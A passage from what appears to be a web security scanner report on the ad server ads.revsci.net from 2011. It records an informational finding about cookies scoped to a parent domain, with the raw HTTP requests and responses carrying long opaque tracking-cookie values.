IWPluELGIVZSpte+L2p8Ak8G+6f39QiQNX9sYMuyPRDbuBHfKyeNWHJBFhuqK4/xZ7D/CTqehq/ghqdhipMBw5Tkr8mdUR/zxczguAqS4lU2jGjyE9g5myCi05INSSRNE5L4DNh54JKfld0ePji0KKkmwnQEKhnIFcxkTlb237bhRQDP++3zP1j2hiLU3mg4xi1Bay7LsKGEYilyYgtuJxssb25KbKk0l2Nx+BftGsREymmYzUPlB6j58myYGRehdpGh0wJvXFJhEomvMt3+RVVtU/Hs/dJeH/HekE15CjTKMwIovoWyWLWkLk/6AzLofDM76Xj3/75JEbK9bptsRjxMDFAem9ySqV4jf0esg7pJ4iPlT5pMZ10V4CW1LSJQcWkybORfD0N5UTmssjs9H6zArVaijt0fVauRh7dRVBdULPsaJ7riVOn6Uyy3PpnD9ux5E93rqsEK1x7fbJO18nv264KJ7YWZM5gXP2LEWHxvabbxbwwGJ1QhIMhDB0OoWtqmkDKiV/MucnamXFEmet8G/Cjst1gkpmYPuG6pBgUPehivSI0fOzA0wV/YCP1uYirYyEalVKutJsu2eWT6Je8BzKdbq10UjW6IpkVn4Go3iH0RzBFoGh24tA44C3aKTJa/2frujwGy2nzvvlF0sL6Rj1PGg46xmLjjYE5SjtBW0D/I+k61vl+3uQyzZb33wWkGruFU4eK51kxOG6IX6C3L2EZDPaFw5tQnQjHUEIn0UPw/CZ7yH+a0h5BL5t32WMOXQTwq/Vl4lnroXyo6Vhf1SzulnavN4Twzu12B47v"; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ8U7xE84mx8cR/xmi3McKUrpVsIwOgHBRuY4DkmM2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oL6zR/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkcZJg/g==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xqR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xqR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TX2x="MLsXrqEO5ihr4JB0esFCP3iNF+pqmlub45YPlOnX049VyMgTcqeWbmnipeB/JrGlJxU5Qewy9Qy2xGUW1fNZS3kgjaogVEgRJznRYvE/JCag2Zhy6/wqe3cIKLE2F4M5TRkHAwa4UhPEVrUN6TcHwqPWgepSOQrGAMWEKXgI9aveV2o/GKg/ikUWZjkM9grghNsod56+40pt0DeP3Sd6CuqR8ruJunOVms0ndtVb56pTF3/HT8AO9lmyq+AMe5jCaXvQksjDJ4VC0lmY7unMPsDKbVmJUsKOb8v47dLpuyu6az+axXednbh2eR3WtwuljO3JdXEPiX2V4wjTz4W7NmCNAMSMId/sniOHHhRcjK9XkuTEEoHl7vuHZ1Cbo2hjlBeXj2B0v1V8F4+hXYuCP4EhlmxFYNCRwiJ0EJPQLmGPpFxsINKEe28fB0FZdc3/eWHMXvBpoBl+ZHXtsYYnorsWC3MqdMRsWIySLSCcOwJnn79Fau6gNDZnPubc0PZB/ls5Z1iUwyOUu7LJZczu78pm2ChSJOCOzkxlPYCEbZyU6vBm+BalK/Pji05l60F2I7Ok/QBlq/scbqnVAmUgEgs2bHZJsiOBoOgzZwLVOSOgmhj3ZIMtuQSSmMTwAYLYnhDwGOJDHITdE4WOuAahUOZ7+UczOYlEyqFQgb1J5xuiZ/4jixcblsFW1MDHuy1RdUOlLFkACldJmAsrxuhKQTznkR2N1rGV85nMgZnlyagVMdufeF+qIv5p3gGebL7zyrSl/lEqwDP4XDOMetQ+Neg3AiuVfUJvFlFNKkkVzA9x0P2IP38RiV/PbdAWB7nT3E+S7HZH4omgJh+DIF3t/+gIKIpTcKQhEvV78bZFFGzmI2yntSoW8Hdx4ivfk5+6WM9sl16wegwKjXMncglzHEnQRSvXvBIFFZ9usXyyqs8KgvqW6CBP/g30+hZfR6iS+tmplYgJPY4Yx66Hl3F5RihsK7f80BTu5iNJwhoA39T+xU/T7C5INS6fzjAj1UHmVY1vpvDzf6ukd8fRlASqp6GN0oAKlEPaZY7GPIc="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUM1IzlHMAYY1A3HkAz1jyt3+1Rp5ZIgoudOS17C7yspOfwTPCNo1WG46bHYwCUC8Wl4wOOguOEurHKK5ymr4fckNKrCI/THbZusvT5koQZT2sgHJub8zAl8yeylWtCht+vqujN0CpLrK5Tb2vMbgRJvPHqMnm0VtLZDe43ydtJA4M05NTSETlisaIkMM/QOAsK+xFPZvnV/pfa5TRBbUukihA5ZLSa46K3CuW8xC3kpZNoWwdNV3yYmD8B8maDBHhbaYLm5/P02m612E1eGsoE97abrfw59xky8uJvZD0i8e3kCU/2FJnVmWnFnXpoxPT7es73wF1fCklA9xyNLi8Ih4fiXI6qtwZkH/k1iaETBrRbU3dybWFOLhNA+UIJ9dbAxlqUWnaWHilccc8JOE+ayRhKJFkoXh6E93wHyutpKStK8FmoxhIJQj7mgJOHLwH7M+zDfqsN6VeXO7UdKtgs3/Hm9LBSRuY/rmLTta203lnZYmWArQ5o7m8D+D/L5ZJcLgfsVYk+qKg3NzYC9tSmkw4omQ4OHqqs+BLAbUpya9N3VPWK1On1xQ3geEPdqDYF+uzceqtbOgWCsm31fyWV0qru7N3uKuHhqBpEL3Q+XaQUKxPc3BnNkF3jjSqwKQfPQ9Va2ptUui3c95cJae4XzS5rw7p3T6njaQPraWTpGTUqa4FFbuSqyUgnm5tHE7IROv7SIqI/WHR6k6AoLuNw4C/G4XA/5o8Q8x69IDZCWryuvSsN8TcJk6/5yjDOK5L9XZH0LqgSL+LYAGvnexRIqOvM/bZ0NFDx3hBkbPmeIvPXqWY+BMRV4Ql/ZJbcTYD92zqCFgBQxGKNSaNS4eWlv5+TzDLCmL5oiWg2NWo0gsP6/az/jA/a8mx9sRhwx99RdFP2VLI9rT690NKMJbPxh3Js4WouDskrJLxgvE8DgXWmUbopc6NOwyrgScDE7Fa+41sZcfA7Kvo/2kwxKPITepHYKgn/YWAwat43+Je5lbKm4oGGz8lIebZ/pSa6rYtmjBYvM4FqvfQpvwd/ryRC2ULgCpmdMLyxtvVYoYul+rddV9Us5XMBNPBQJNRgPlWvL544A6ioDWszv97zpIYHRVPm/YNfvQFhM0+bDBi9cPOGIOSSh008PYUZptfdE68d/XznQDJe3vt2BTT8Cfi7Ww1c7BSfIjoUwgjXjO94RjOQwIt2417qBxKEhQ6XcrE9+TixRqfjrLMtJGUhqC6AOjQVLtPkFdgLBRk0KBgXJ7ITEMFxGo22bjDupzkfdAYIKgqZHvHlu3D1XbEPVy2TYGogy8zL2qgodd4acPkIUxaNnO4+R6D0cG6+5k3HMVIanTW5JY/4yZUr5L8CeFqUc5MyhwDGr8YDHFI6MygEvKh4QQkeR4dF/Q8yimeh+7Oj+JuRw6OHK3iKIKTExLmGkMuPSOZ0jZEVLHC0VyIj+rmC9jqxRv1E7SydLJMlLbkba/zFi5zeeuf6foNmAo3U1CxM0a775iAQRqN1M5k5P3vNgqvutTIE9NeCxGjOzzfw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 13:59:44 GMT

GIF89a.............!.......,...........D..;

9.12. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_random=208878393&rsi_pub=E083D538668BB69EC4795771A0EDA581&rsi_site=626E5E04865D079794DE6011BF30AD87&rsi_width=728&rsi_height=90&rsi_secure=0&rsi_url=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&rsi_referrer=&rsi_title=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C%20enrages%20%7C%20FLORIDA%20TODAY%20%7C%20floridatoday.com&rsi_inf=0 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsiPus_oJ6I="MLsXrqEO5ihr4JB0esFCP3iTwKJkgx2gQRTIgLpbO5bzUKo5agSRamM8BUBiXf5iQVJE/qvOLDxrtPlWva+WFfRLnrsgVEgRJznRYvE/JCbIJlFRZ0v8lk2FMP7VgY0aDJ1uvr3sxbowAuFyRMBuLfYcr6fFEv89nuq04UGKmDchPxvf1VTgDWJTEx5Kkr8jzQunm+6oPneCoGtSQhyGHZzxdfyY9pzlPM/onuX9X2JdmNFRliGjpOxxE+0pD+DBZZWgpAquHQkJ1YB5V5px1bD3K+pKttxiYRyYsLRuin4AdpE+D57tHyWhDKXYnaxmhDlbT40RVZTlQWa5SHr/yRW15cgoL2BTNz4ZHIOIbZ3w+GOVtetiHdAwjqA5Ui4WrA6bK25LLI4Ir9sIh2o24VUvkbMIaqCDNsF2jNanIWOT86v7ILEO8GTv7ysgdBPV7GNAhaATIC6+9HWKklodYgNie3KEsyxp4Ip53yIQktBt7x0rOG5/65JnmRP6pZbn0beJZ9e2WzN097dXeixXnHdq6JFVAyAbmpVkkwNOY+wWd6dg4Jf/QXM8CJVkFVKLOlMwzlBml/4yW2mwTMAgsUWTbJEe3D5h5Qu+avLmgFYgCdm3afOE65XEGgbY6gQI2QyUKfE89OzxvQEeuV8Z29PLI2LFlmgFNy3CKVxZ5PwiIOfTemnz/u34vuwdvk5OwPoIKx6wc64f4XUyQCxKRAMtrDlD3lqOkddwPiQPQWSdxvqE7+8qAf4lJEA0RdLVS+EOIKQcs4IiqbmLClAFvanxVnt8+DAJ/at8TweJdiurVsUJ39ifvys0hlSV/6J8xDBFRvnTXW7RHu077j5I8EhkX0VLoUvlsoHLXJRFSkMMdD1Rjk6kj6u7MTXab7InNjSHU6mj9FV6J71+hVaENmvO6xRYxe8DwuUoxcZGfl++Mz5gpSVkriCBhEEVGAa0whhl40WBypkKGx6ytK8eGBxCHtMy7YXpAt8GVfXO2nHdDF5NRbljpX5a2idAiaY9hZRKaSwdCl0zO8qy8rZheiOX4dGOkvvILbHnPIk="; rsi_us_1000000="pUM1Iz9HMAYU1O2WQ6agQvHtomeqiTx+scbgotrS/irrnp9hR1uXbUVk0H3WxoeLl/xLNe9VpQo58/SfnwRIVPklZlA8PnoYUYWIbDUqYS9zQYnZsUoP3QRkponkl0tHHb8kkKwgkXBko7XOn1jpgcgJQ3/+sBnkvl0R76S9Yt1TpYoxEcshze8XSI9IYwGJZAQM8acKU6QFRiQuOSfWyKPrE4VIXPPwX8RUWiY/UssOCRqN2G4sqarRk4NsaJRnlj2K1Y5HUKhRsrHbW1pTdRNtT9ZKulZhziyboYdrEO2sarAl/MFVZsjwi/Wv3qLm1Fs/xHiIfiPD8ptaFv53hhEy0x9Nzgra6z5i1sNDBdwC2AMM5jmRxk1HiSJ7rc7geNXoMpcoW5lazev62kFjic7GRlCPMyreliDoEbRStv8bUX0hzqBtlrJJ71XkLAtbR3bp3YXVlT/i03+GD+X4pnqR31ooqOicd/3sY/HfyHpsfYFpK+9cKfsOK0TMqmEZgg6TVATszTa6DVBy+9HIW60cgGORBfFeA3V7ZWrc7A/f4TCz6oav7WuUpl/8FU3EZiYlcqNpGIiqu0EDyUFyBc0Mm83cLtn7n1YkzNAWKjM3BMlNOvL7luAFxGav7veb18OL8FnDLIcc98IdSjePgO4x+TnvWMc1o3LMnx7KFnEVNL/zr/l7lPtA+JVzT7cnj2wyE4QaQHKh6Ok04D+HbZpnYVGPcUhH7ir4iXn1X1fRi2WC4X27+2MYNn6XJpgOOB6hxeYRKJezFPVyYHA0E8k8Y6vPmqAzcUQ1GgmrtVMO5TynL7MxkjlDhd/qkAAADTkEWFYjM+71vkik63NbiYJzNhUruoYNDY4+Cdad8nntQwYFdaZi2z0oTqrM2W9VLHxiO/W3OZ/DoHhIVOR05q3qEJsSQqz4HlTPFqdP6tMOPEdT2mlN6I+snoH5H1+95/20PTZV63bqPslFDdpjQUzOUzlGEQz5vlwfpcobNG6ZffmcfXkVRA90ZS5vDX6RoLFO4jXs4PfHmOaxRujzc+ZZx71yBGG4cW6a3AIc/QKBNjPUub61ya2Yeam0YNeI4XUBKw1I8arhmHwBw24bTrJB78myPAavjRhXseaoyMiRz2SpgrQict90ITDGOCmvQzQHHUwrMEuS4OMOI9nlvFiigkXOsxfJqbwLbPJxK7vepa4gP5k5reKfLJLOzB1tAhyu+0M+ogOQqwjKAaQSNYVRfyphA/AzKCF02DWfoPvuUecdYTEKFjQ1VG+g3YxKNYroKXLd8VGMnDiPqMcBJGPJAP5XjR0FOhbahAhbE9hcU3YzJtc0N15WcuBwumA6aiTCtPbC5GocnaApsWij2wpzPNdaYaar/KwBLK+unvGZw9So2/L8umdKyijf1qIYR3BsN1iRRVSFtpq1rjLe/12ruK+l5hbTSkGCxSxVj27tdXKbj+wNhb0Grx0f0RVz96JdXLab+X7gER0OWV6Ub93Iau3V3nA8U2eR3eW8WCzYma60upmY8LQB1Wa9Fjetzfo="; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D-6M="MLsXsqMOJjhv5pB0GuK8L0HP6TxvTJOb5RPKlFjm2oawXHqkUpttbu+TpTQ7/r5k2TkfGHxsBiWalfeAB/i2ZeDVh3sNrEwwJAMx4il/KokORw7o/SdsY9rD5Rran1cYTu5H2glQ6wiGGbe7BONawjupeQmuCxD6wLXUENGDz17XkpjDubHWNj6MzdO20TKeo2ebTm+X/aIFIAjSHwRm25h7faDJboBly37SaRVTJmVSVncsdODBYijyuPYTdFwC03sgxGgMINUQBU941lqVIMhGuSaJnSZ1bjvqoCCRDLRyqJCi6WnVSUpydvqvGWVlBYhxf+2EJFBlcMlHTpZKXGT1HeSqJJiOoXZpr/uvbpKdN1F5nqoIZKyR9HZy2TbKbYnBNFxzgutHbw6zXXppgfBJaWgOtCOMhs/ZZJ3OA1pxSjhPMmisV+EotP7wA2c0D7Io2lBYNXPe+9NRjvYmJrWaYkh2V9cxr+G5/xpyO81WenMWdhNnGRMtQomwCOTzjyZJYxNaLgOUEIIKY/A87ufnJ5qjqqB+BP8joxvEdW3W1Npu2B+Na3ecvL1Hhc5ZC1GBTQF0B1zfcmgxi8UCiZBmR2u4TvNpihWJeHOeADYhYgHy7fOE602RwkvfJpCdu7CgEkl/EapX90ymBIYIqwTRnrIV8fRqLA/JDPUN6wj4Po1l5cmK4VoP0sL52LnFEkGOXjlWFKb/dz4QQVlB3RU1uDB5Q2eyVzyWDhLN6+otEMWxip/DPpeVZFX20gRQOs9ik/EEMEZ5SBlEKXm9E12aY3Lb8xP23GKX6t28Fv8oVf0A9Hzq3RgaRIvYuSeHKg9n7kgHYmsqEC5FNeGc7ov2Rk7IAiVAilbtLgqkH3JaN/btEetkR3e86wQSucxk5aStmOWDZrorIifNpOczosSxBSP3da2SvQWkfJfNRVfxtlhd7qB8LBiXDl2SUm9TMHyJ+KLZ20a5mxC8xN7Om6Kt5yd5T28UAIR5tZznNV/NkyVtt/ytpEiB8NmrJm1LxAnC+RcrDEAr8/agqLZBIx3GTt7wIpqdhFr58Dzg"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUN9Iz9DOAYU1O2uA3Nf1wgg9Tpj7P8STnjz/8LS/qprmdrNu/Wv+Yp2mpP2gxUFQc/rlHGwyyG/2blenQfG1l0Q/iLSgjgPy6DOmNB2RidToi9fOv5uXgl8+4W0L5YmY28pH9JqakD06xSknvL5GRJuLPqNluHWRddDf63qduJIoP35MjeUiF+saJEMy/UOMsbiRDD+AqcM3wOeIhml4rFWgSAbj5SiITj5PrU4NK/fHsY65IwlXPMI/pKzvuGuzGzhzcEk1KynD5qCt8jOSkM2oAlc0wx6QlyPfCUZPATyRdNFhEM5y9lsLQ0p8cg4khQHQccUe1bCkkhdhyNLjcJh4RhXA7qtoRmA/3jVPEVUy61DKwIuJLIHRusqJVlbHTumZDnWUlnilqW9jrYlGM4+dhWXAfb4gtdKaz0GKHus33rMTSxatHCCitc45ODJwXHyOzv/BcA6smRRrYOTGGrag2N6reait+mxyihdCmQBnnZYh2AjQyI1DujvXsL5ZBYLhfsRYs+tan3tzYKttQmkwnqlQ4vHKqg6BIgbUvya8t7FHWwzO3V3Q3AcEP9oXSVv6oMtWTCV98nh0Alk8ravDhoJbJkk3NhdxtyWNrFELGmL/PNXc1h9zBAY9vEeNFGRkVf2u+Mui0cz5sNGO8Uzy5sT+eHKqO0Lmtn0vA7CspugEbQv/vdjaBRqge2SjgrxVqGBFx82gTqIDlHt06oiisS2tQF5pRZbQrxnMZ5to24HAkZhEcKgWJOBJJBtJr5X5kUPq6xZgyzowadexRLuAcwobZ0FFCxzxOyiPmeJMgbKV8+BMRRwQl7ZZTczcD92zqidoBQxGLupenkFRWHHCzlhmwYSyRBPqEdgyW4BPKRdwlJ3PZul3jLx1PtQ4NRdGHd5YH1BsN0KCa9yZCW9yODwolH/aBISyjfq0mg+ILAD634YEvdwzGwHe6n0NZxKYYZCDhUuKwz9gCXdEuFItH0gBJApTVgbxbVJBw9SYPnDTm20ZnCUGnXDMGOeRjFFIE9e7Z+UWuTTsnHpU0l5prxyTXe7oRSxpEBEk/ZqjaXH2B+6cd+R0f/jFy2EMYm6+pJDwthlUTpRDB0YZ0iUsB/sp3GzuDrmZKUmBcxvnrxfYDmLFGZpcsmlejWoWCCK1ygwfY0CDcigYCPasCONAsMXSSO2PlVZ3X9r+WNc9ZxAhE3kS3bni2yb64gi/FusJre1KWVPFoYCnANej9xGlU/w37shrHplGwwi2CmPIhr8ESop1mEX0CN9mqRhC5UV+837fNG18SC3vWzvuax0/sY9ZAK+vVhycciXqeVl6l2aRvZs5QBtWoIyaTCIIPUqsvFmBAGDmJ+zmYerK9EBYZJt7pp+wasNsfeq8+lJLwmmQvtWOLtWraxYr8ZZ24/BijoxGDUTdTpDpeeWDA6VmccDk+Ah9R/lF9IXZWDidngc8JPc3C7ITqz4YFQjkYRQ+lKF7SX8xQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:29 GMT
Content-Length: 1582

